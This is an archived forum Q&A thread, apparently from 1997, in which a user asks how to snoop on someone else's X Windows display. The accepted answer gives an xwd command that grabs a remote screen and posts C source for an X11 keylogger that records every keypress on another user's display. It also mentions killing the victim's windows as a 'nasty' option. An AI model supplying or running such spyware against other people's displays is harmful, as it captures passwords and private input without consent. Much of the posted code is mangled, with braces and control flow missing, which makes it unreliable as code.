Snooping other windows in X-Windows.

Posted on 1997-06-01
Last Modified: 2013-12-26
Hi. How can I snoop another window?
In answer to my previos question dhm wrote : "There are ways to snoop on somebody else's window, but that's not what you
asked :-)". So, OK, now I'm asking , how can I snoop somebody else's window? Thanks for Your help.
Question by:dpodvaln
  • 2

Accepted Solution

leendert earned 250 total points
ID: 1293159


I know of two ways to snoop someone else's window. With
both these methods you will need access via
xhost +<your machines name> from the machine you'd like to
snoop. That is you will need to enter the command
xhost +<your machine's name> from the other person's machine
if the stuff mentioned underneath does not work.

Here are the two methods:

1) This one will bring back a snapshot of the other machines

   Here is the command :
   xwd -root -display machinename:0.0  | xwud

   where machinename is the name of the machine you'd like
   to take the snapshot from.

2) The second is a .c program with wich you can see exactly
   what keystrokes the other party uses. Compile it and run
   it with the display of the other machine as parameter.

      example : xtspy machinename:0.0

Here is the .c program :

#include <sys/types.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
#include <stdio.h>
#include <ctype.h>
#include <utmp.h>

 * Defines to work around System V
#define bcopy(s1, s2, len) memcpy(s2, s1, len)
#define index(s, c) strchr(s, c)
#define rindex(s, c) strrchr(s, c)
#define bzero(s, len) memset(s, 0, len)
#define bcmp(s1, s2, len) (memcmp(s1, s2, len)!=0)
#define WAITIME 5

#define USIZ    (sizeof(struct utmp))

extern char *malloc ();
extern char *realloc ();
extern off_t lseek ();

static void
szprint (s, max)
char *s;
int max;
    /* catch the guy even if he puts esc. codes in ! */
    while (max-- && *s != '\0')
        if (isprint (*s))
            (void) fprintf (stderr, "%c", *s++);
            (void) fprintf (stderr, "(0x%X)", *s++);

static void
notify (old, new)
struct utmp *old;
struct utmp *new;
    char *op;
    struct utmp *u;

    u = new;
    op = "in";
    if (new->ut_name[0] == '\0')
        u = old;
        op = "out";

    szprint (u->ut_name, sizeof (u->ut_name));
    if (u->ut_line[0] != '\0')
        (void) fprintf (stderr, "@");
        szprint (u->ut_line, sizeof (u->ut_line));
    (void) fprintf (stderr, " (");
    szprint (u->ut_line, sizeof (u->ut_line));
    (void) fprintf (stderr, ") logged %s\n", op);

main ()
    time_t m_time;
    int utfd;
    struct utmp *up;
    struct utmp ubuf;
    int upsiz;
    struct stat sbuf;

    if (stat (UTMP_FILE, &sbuf) != 0 || (utfd = open (UTMP_FILE, O_RDONLY)) < 0)
        perror (UTMP_FILE);
        exit (1);
    m_time = sbuf.st_mtime;

    if ((up = (struct utmp *) malloc ((unsigned) sbuf.st_size)) == NULL)
        perror ("malloc utmp buffer");
        exit (1);
    upsiz = sbuf.st_size;

    if (read (utfd, (char *) up, (int) sbuf.st_size) != sbuf.st_size)
        (void) fprintf (stderr, "read %ld bytes from ", sbuf.st_size);
        perror (UTMP_FILE);
        exit (1);

    while (1)
        if (getppid () == 1)
            exit (0);

        (void) sleep (WAITIME);

        if (stat (UTMP_FILE, &sbuf) < 0)
            perror (UTMP_FILE);
            exit (1);

        if (upsiz < sbuf.st_size)
            up = (struct utmp *) realloc ((char *) up, (unsigned) sbuf.st_size);
            if (up == NULL)
                perror ("realloc utmp buffer");
                exit (1);
            upsiz = sbuf.st_size;

        if (sbuf.st_mtime != m_time)
            int i;

            if (lseek (utfd, 0L, 0) != 0L)

            for (i = 0; i < sbuf.st_size / USIZ; i++)
                if (read (utfd, (char *) &ubuf, USIZ) != USIZ)
                if (bcmp ((char *) &up[i], (char *) &ubuf, USIZ))
                    notify (&up[i], &ubuf);
                    (void) bcopy ((char *) &ubuf, (char *) &up[i], USIZ);
            m_time = sbuf.st_mtime;

Try the above. Hope this will solve your problem...


Expert Comment

ID: 1293160
Hi there,

I actually uploaded the wrong c file to snoop another
machines xwindows...

Here is the correct one. Sorry about that... :-}

 * To Compile, run it through gcc like
 * this :
 *    gcc -o xkey xkey.c -lX11 -lm
 * To run it, just use it like this :  xkey displayname:0
 * and watch as that display's keypresses show up in your shell window.
 *    Dominic Giampaolo (
#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>

char *TranslateKeyCode(XEvent *ev);

Display *d;

void snoop_all_windows(Window root, unsigned long type)
  static int level = 0;
  Window parent, *children, *child2;
  unsigned int nchildren;
  int stat, i,j,k;


  stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
  if (stat == FALSE)
     fprintf(stderr, "Can't query window tree...\n");

  if (nchildren == 0)

  /* For a more drastic inidication of the problem being exploited
   * here, you can change these calls to XSelectInput() to something
   * like XClearWindow(d, children[i]) or if you want to be real
   * nasty, do XKillWindow(d, children[i]).  Of course if you do that,
   * then you'll want to remove the loop in main().
   * The whole point of this exercise being that I shouldn't be
   * allowed to manipulate resources which do not belong to me.
  XSelectInput(d, root, type);

  for(i=0; i < nchildren; i++)
     XSelectInput(d, children[i], type);
     snoop_all_windows(children[i], type);

  XFree((char *)children);

void main(int argc, char **argv)
  char *hostname;
  char *string;
  XEvent xev;
  int count = 0;

  if (argv[1] == NULL)
    hostname = ":0";
    hostname = argv[1];

  d = XOpenDisplay(hostname);
  if (d == NULL)
     fprintf(stderr, "Blah, can't open display: %s\n", hostname);

  snoop_all_windows(DefaultRootWindow(d), KeyPressMask);

     XNextEvent(d, &xev);

     string = TranslateKeyCode(&xev);
     if (string == NULL)

     if (*string == '\r')
     else if (strlen(string) == 1)
       printf("%s", string);
       printf("<<%s>>", string);

#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];

char *TranslateKeyCode(XEvent *ev)
  int count;
  char *tmp;
  KeySym ks;

  if (ev)
     count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
     key_buff[count] = '\0';

     if (count == 0)
        tmp = XKeysymToString(ks);
        if (tmp)
          strcpy(key_buff, tmp);
          strcpy(key_buff, "");

     return key_buff;
    return NULL;


This will help you out on your problem...


Featured Post

Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Define unique primary key 9 89
sumNumber challenge 16 111
scoreUp challenge 14 57
Problem to event 3 79
Introduction: Finishing the grid – keyboard support for arrow keys to manoeuvre, entering the numbers.  The PreTranslateMessage function is to be used to intercept and respond to keyboard events. Continuing from the fourth article about sudoku. …
Have you tried to learn about Unicode, UTF-8, and multibyte text encoding and all the articles are just too "academic" or too technical? This article aims to make the whole topic easy for just about anyone to understand.
This video will show you how to get GIT to work in Eclipse.   It will walk you through how to install the EGit plugin in eclipse and how to checkout an existing repository.
Learn how to create flexible layouts using relative units in CSS.  New relative units added in CSS3 include vw(viewports width), vh(viewports height), vmin(minimum of viewports height and width), and vmax (maximum of viewports height and width).

864 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

24 Experts available now in Live!

Get 1:1 Help Now